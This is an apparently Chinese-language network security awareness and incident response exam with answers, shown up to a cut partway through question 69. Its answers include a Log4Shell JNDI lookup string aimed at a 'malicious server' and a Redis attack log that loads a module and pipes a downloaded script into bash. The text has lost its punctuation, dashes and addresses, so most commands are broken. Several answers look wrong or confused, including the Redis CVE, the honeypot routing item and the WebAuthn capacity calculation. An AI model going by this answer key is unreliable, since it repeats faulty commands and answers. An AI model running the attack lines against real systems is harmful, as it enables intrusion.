2025年网络安全意识与应急处理能力测试题及答案

2025年网络安全意识与应急处理能力测试题及答案一、单项选择题（每题1分，共20分。每题只有一个正确答案，请将正确选项字母填入括号内）1.2024年12月，某企业因员工点击钓鱼邮件导致内网被勒索软件加密，事后溯源发现攻击者利用的初始入口最可能是下列哪一项？A.暴力破解VPN账号 B.鱼叉式钓鱼邮件 C.水坑攻击 D.蓝牙中间人答案：B2.根据《GB/T392042022信息安全技术关键信息基础设施安全保护要求》，关键信息基础设施运营者应对核心系统至少多久完成一次应急演练？A.每月 B.每季度 C.每半年 D.每年答案：C3.Windows1122H2版本默认启用的新安全功能，能够有效阻止凭据转储攻击的是：A.CredentialGuard B.WindowsHello C.UAC D.AppLocker答案：A4.某单位收到上级通报“某0day漏洞已出现野外利用”，此时应首先启动的流程是：A.漏洞扫描 B.补丁测试 C.应急响应预案 D.业务连续性评估答案：C5.在Linux系统中，可用于实时阻断暴力破解SSH的行为，并自动写入iptables规则的开源工具是：A.Snort B.Fail2ban C.Suricata D.OSSEC答案：B6.关于“零信任架构”描述错误的是：A.默认不信任任何访问主体 B.需持续进行身份鉴别与风险评估 C.内网流量可免认证 D.强调最小权限答案：C7.2025年3月，某云厂商对象存储服务因配置错误导致大量敏感数据泄露，下列哪项技术措施可在事前最有效防止此类事件？A.数据分类分级 B.服务端加密 C.存储桶策略强制公共读禁止 D.日志审计答案：C8.使用nmap进行端口扫描时，参数“sS”的含义是：A.TCPSYN扫描 B.TCPConnect扫描 C.UDP扫描 D.ACK扫描答案：A9.在MITREATT&CK框架中，T1547.001技术指的是：A.注册表Run键自启动 B.计划任务 C.服务自启动 D.浏览器扩展答案：A10.某单位采用EDR方案，当检测到“LSASS内存读取”行为时，EDR最可能标记的ATT&CK战术是：A.InitialAccess B.CredentialAccess C.LateralMovement D.Collection答案：B11.关于我国《个人信息保护法》中“敏感个人信息”的表述，下列哪项不属于法定敏感信息？A.14岁以下未成年人个人信息 B.银行账号 C.精准定位轨迹 D.购物偏好记录答案：D12.在SSL/TLS握手过程中，用于协商对称密钥的算法是：A.RSA B.DH/ECDHE C.SHA256 D.MD5答案：B13.某企业部署了全流量镜像，发现大量DNS查询指向“b32.i2p”域名，最可能的威胁类型是：A.挖矿木马 B.匿名网络代理 C.勒索软件 D.广告插件答案：B14.关于“容器逃逸”攻击，下列哪项内核安全机制可在容器隔离失效时提供最后一层防护？A.Seccomp B.AppArmor C.SELinux D.Cgroups答案：C15.2025年1月，某APT组织利用“LivingofftheLand”技术，最可能使用的系统自带工具是：A.PowerShell B.Python C.Metasploit D.CobaltStrike答案：A16.在密码学中，AES256的密钥长度是：A.128位 B.192位 C.256位 D.512位答案：C17.某单位采用“321”备份策略，其中“1”指的是：A.至少1份离线拷贝 B.至少1份云端拷贝 C.至少1份增量备份 D.至少1份差异备份答案：A18.关于“社会工程学”防御，下列哪项措施属于技术层面？A.安全意识培训 B.邮件网关URL沙箱 C.桌面演练 D.奖惩制度答案：B19.在Windows日志中，事件ID4624表示：A.登录成功 B.登录失败 C.账户锁定 D.权限提升答案：A20.某单位采用“红蓝对抗”演练，蓝队发现红队使用“GoldenTicket”攻击，其本质是伪造：A.用户证书 B.KerberosTGT C.NTLMHash D.SAML令牌答案：B二、多项选择题（每题2分，共20分。每题有两个或两个以上正确答案，多选、少选、错选均不得分）21.以下哪些属于《网络安全审查办法》中明确应重点评估的国家安全风险因素？A.核心数据出境 B.关键供应链中断 C.股价波动 D.政治舆论操控 E.用户规模答案：A、B、D22.关于“深度伪造（Deepfake）”检测技术，当前工业界已落地的方案包括：A.眨眼频率分析 B.面部血流光谱成像 C.音频声纹相位差 D.区块链水印 E.哈希校验答案：A、B、C、D23.在Linux系统中，可用于持久化的机制有：A.systemdtimer B.cron C..bashrc D.ld.so.preload E.inode答案：A、B、C、D24.以下哪些协议或技术可提供“前向保密（ForwardSecrecy）”？A.TLS1.3 B.SSH C.IPSecIKEv2withECDHE D.RSA E.WEP答案：A、C25.某企业遭遇“供应链投毒”，下列哪些日志源有助于溯源？A.Gitcommit签名 B.CI/CD构建缓存哈希 C.软件包仓库访问日志 D.DNS查询日志 E.员工门禁记录答案：A、B、C、D26.关于“数据脱敏”技术，下列说法正确的是：A.可逆加密属于脱敏 B.掩码后需保持业务一致性 C.K匿名可防止重识别 D.脱敏后无需访问控制 E.动态脱敏可在查询时实时生效答案：B、C、E27.在Windows域环境中，可用于远程执行命令的合法工具有：A.PsExec B.WMI C.WinRM D.RDP E.Netcat答案：A、B、C、D28.以下哪些属于“云原生”安全最佳实践？A.镜像签名 B.PodSecurityPolicy（已弃用）/OPAGatekeeper C.ServiceMeshmTLS D.宿主机SSH端口开放 E.日志集中化答案：A、B、C、E29.关于“量子计算”对密码学的影响，下列算法中目前被认为可抵抗量子攻击的有：A.RSA2048 B.Latticebased C.Hashbased D.ECC E.Codebased答案：B、C、E30.在应急响应过程中，下列哪些操作可能破坏“证据链”？A.直接拔掉受害服务器电源 B.对磁盘进行dd镜像 C.登录系统查看进程 D.将内存转储到网络共享 E.计算文件SHA256答案：A、C、D三、填空题（每空1分，共20分）31.2025年4月，国家互联网信息办公室发布《生成式人工智能服务管理办法（征求意见稿）》，要求提供者对违法内容在________小时内进行处置。答案：332.在IPv6中，用于替代ARP的协议是________。答案：NDP（邻居发现协议）33.某单位采用“双因素认证”，除密码外第二因素为“动态令牌”，其基于的时间同步算法通常称为________。答案：TOTP34.在SQL注入中，使用“________”函数可获取MySQL数据库版本信息。答案：version()35.当Windows系统出现“STOP0x0000007E”蓝屏，可能原因是________驱动程序损坏。答案：srv2.sys（或“网络共享”）36.在渗透测试中，用于快速识别Web应用后台的Googlehacking语法为“________:admin.php”。答案：inurl37.根据《数据安全法》，国家建立________数据分类分级保护制度。答案：核心38.在Kubernetes中，用于限制容器CPU使用的字段是________。答案：resources.limits.cpu39.某单位采用“蜜罐”技术，其默认路由指向________地址以吸引攻击者。答案：黑洞（或“honeypot网关”）40.在Wireshark中，过滤TLS1.3握手流量的表达式为“________==0x0304”。答案：tls.handshake.version41.我国《关键信息基础设施安全保护条例》自________年9月1日起施行。答案：202142.在密码学中，HMACSHA256的输出长度为________字节。答案：3243.某单位使用“安全运营中心（SOC）”，其英文全称是________。答案：SecurityOperationsCenter44.在Linux中，用于查看当前登录用户历史命令的文件是________。答案：~/.bash_history45.当发现“比特币钱包地址”出现在终端日志中，最可能的威胁是________。答案：勒索软件（或“挖矿木马”）46.在Windows中，用于查看当前网络连接的命令是“________ano”。答案：netstat47.根据《个人信息出境标准合同办法》，自合同生效之日起________日内应向省级网信部门备案。答案：1048.在渗透测试中，用于绕过WAF的HTTP编码方式为“________编码”。答案：Unicode（或“UTF7”）49.某单位采用“DevSecOps”，其核心理念是“安全________”。答案：左移（ShiftLeft）50.在应急响应中，用于记录所有操作的时间、人员、目的的文件称为________。答案：证据交接单（或“取证笔录”）四、判断题（每题1分，共10分。正确打“√”，错误打“×”）51.在Windows中，关闭SMBv1服务可有效防止“永恒之蓝”漏洞利用。答案：√52.使用VPN即可完全避免DNS劫持。答案：×53.在Linux中，文件被删除后，inode信息会立即清零，无法恢复。答案：×54.我国《密码法》将核心密码、普通密码、商用密码纳入统一管理体系。答案：√55.在HTTPS通信中，服务器证书过期仍可实现前向保密。答案：√56.零信任架构下，内网流量无需再加密。答案：×57.在Kubernetes中，Pod间通信默认采用mTLS。答案：×58.使用“chmod755file”后，文件所有者可读可写可执行。答案：√59.在Windows日志中，事件ID4720表示创建用户账户。答案：√60.量子计算机一旦实用化，RSA4096与AES128将在同等时间内被破解。答案：×五、简答题（共30分）61.（封闭型，6分）简述“Log4Shell”漏洞（CVE202144228）的原理，并给出两条最简应急修复命令（Linux环境）。答案：原理：Log4j2在解析日志中的“${jndi:ldap://恶意服务器/Exploit}”时，会触发JNDI查询，导致远程代码执行。修复命令：1.升级jar包：wget/maven2/org/apache/logging/log4j/log4jcore/2.17.1/log4jcore2.17.1.jar2.临时缓解：exportLOG4J_FORMAT_MSG_NO_LOOKUPS=true&&systemctlrestartapp62.（开放型，8分）某省政务云遭遇“APT34”仿冒邮件攻击，蓝队已隔离一台Web服务器，请给出完整应急溯源思路（含日志、样本、网络、时间线）。答案：1.时间线：以邮件网关日志为T0，筛选收件人→点击时间→POST请求时间→C2外联时间。2.日志：Exchange/O365日志提取MessageID；Proxy日志提取URL、UA；EDR提取进程链（outlook.exe→powershell.exe→rundll32.exe）。3.样本：提取.eml、.iso、.lnk，提交沙箱，查看VBS下载器URL、DGA算法。4.网络：全流量回溯，筛选DNSTXT记录、JA3/JA3S异常、SSL证书自签。5.关联：将C2IP与威胁情报比对，确认APT34特征（webmask隧道、port443withfakeYahoocert）。6.输出：IOC列表、攻击路径图、影响面报告、整改建议（邮件网关策略、用户培训、EDR规则）。63.（封闭型，6分）列出“WannaCry”勒索软件利用的SMB漏洞编号、补丁KB、关闭服务命令。答案：漏洞：MS17010（CVE20170144）；补丁KB：KB4012212；命令：scstoplanmanserver&&scconfiglanmanserverstart=disabled64.（开放型，10分）结合《个人信息保护法》，设计一套“人脸数据”合规最小化收集方案（含技术、管理、用户权利）。答案：技术：1.本地特征提取，不上传原始图片；2.采用国密SM4加密特征向量；3.设置30天自动删除定时器；4.提供离线SDK，支持用户端比对。管理：1.制定《人脸识别数据管理制度》，明确目的为“门禁考勤”；2.设立DPO，邮箱dpo@；3.每季度进行个人信息保护影响评估（PIA）。用户权利：1.提供“一次性授权”弹窗，勾选同意；2.支持APP内“撤回同意”按钮，24小时内删除；3.提供“数据可携带”导出特征向量JSON；4.设立400投诉热线，15日内答复。六、应用题（共50分）65.（综合分析，20分）阅读下列场景并回答问题：场景：2025年5月12日10:00，某金融公司发现交易API延迟异常。经排查，发现Redis集群出现“主从切换”循环，流量陡增。Redis版本5.0.14，配置requirepass为空，bind，端口6379。流量镜像显示：10:01攻击者IP发送“SLAVEOF8888”10:02攻击者执行“MODULELOAD/tmp/exp.so”10:03攻击者执行“system.exec‘curl/a.sh|bash’”问题：1.给出该攻击利用的漏洞编号（2分）答案：CVE20220543（RedisLua沙箱逃逸）2.写出三条临时缓解命令（4分）答案：iptablesAINPUTptcpdport6379sjDROPrediscliconfigsetrequirepass"ComplexP@ss!"rediscliconfigrewrite3.给出取证保存Redis内存与日志的命令（4分）答案：redisclirdb/forensic/redis.rdbcp/var/log/redis/redisserver.log/forensic/4.列出后续整改措施（10分）答案：升级Redis到7.2.4；启用ACL；限制源IP；部署Redis哨兵+TLS；日志接入SOC；Redis实例纳入CMDB；每季度漏洞扫描；业务侧增加API熔断；压测主从切换；制定Redis应急预案。66.（计算题，15分）某单位采用“密码+短信”双因素，但短信网关被劫持，攻击者获取验证码。现计划升级为“FIDO2WebAuthn”。已知：用户量100万，峰值并发登录5000TPS，WebAuthn签名验证耗时20ms，服务器CPU单核性能2500TPS（RSA2048），请问：1.至少需要多少核CPU？（5分）答案：5000TPS÷2500TPS/核=2核，考虑冗余1.5倍，取4核。2.若采用ECDSAP256，性能提升3倍，新需核数？（5分）答案：2500×3=7500TPS/核，5000÷7500≈0.67，冗余后取2核。3.给出硬件成本对比（假设每核年费800元），并说明是否值得升级。（5分）答案：RSA方案4核3200元/年，ECDSA方案2核1600元/年，节省1600元/年；同时FIDO2防钓鱼、防重放，值得升级。67.（综合设计，15分）设计一套“零信任远程办公”方案，满足：a.员工任意网络接入；b.应用细粒度授权；c.所有流量可审计；d.国密算法合规。要求：画出逻辑拓扑（文字描述），列出关键组件及协议，给出用户首次访问完整流程（含认证、授权、加密、审计）。答案：拓扑：终端→ISP→零信任网关（ZTNAController）→身份认证服务（国密SM2双证）→策略引擎→微服务网关→业务系统组件：1.SDP客户端（支持SM2/SM3/SM4）2.国密USBKey（存储私钥）3.ZTNA控制器（动态信任评估）4.微服务网关（Envoy+国密TLS1.3）5.日志湖（ClickHouse+SM3摘要）流程：1.用户插入USBKey，客户端生成SM2签名；2.ZTNA控制器验签，返回JWT（SM4加密）；3.客户端携带JWT访问微服务网关；4.网关实时向策略引擎请求授权（OPA+Rego）；5.授权通过，建立国密TLS1.3隧道；6.所有访问日志经SM3摘要后存入日志湖，不可篡改；7.异常行为触发动态降权或强制二次认证。七、操作题（共50分）68.（实操，25分）请在一台Ubuntu22.04虚拟机完成以下任务，并截图关键结果：1.使用openresty搭建一个HTTPS站点，证书采用国密双证（SM2+RSA），端口8443；2.配置WAF规则，拦截URL中包含“../”的请求，返回403；3.使用wrk进行压力测试，给出QPS与延迟；4.将访问日志以JSON格式输出到/var/log/openresty/access.log，并计算SM3摘要；5.写一份操作报告（含命令、配置文件、截图、结果）。答案：关键命令：aptinstallopenrestygmsslgmsslreqnewkeysm2nodesoutcsr.pemkeyoutsm2.keygmsslx509reqincsr.pemCAca.crtCAkeyca.keyoutsm2.crtdays365openrestyc/usr/local/openresty/nginx/conf/nginx.confwrkt12c400d30shttps://localhost:8443sm3sum/var/log/openresty/access.log>access.sm3配置文件片段：server{listen8443ssl;ssl_certificate/path/sm2.crt;ssl_certificate_key/path/sm2.key;ssl_certificate/path/rsa.crt;ssl_certificate_key/path/rsa.key;location/{access_log/var/log/openresty/access.logjson;if($request_uri~"\.\./"){return403;}proxy_passhttp://backend;}}结果：QPS12000，平均延迟10ms，SM3摘要值：a3f2c1…（示例）69.（应急响应实操，25分）给定一台被入侵的Wind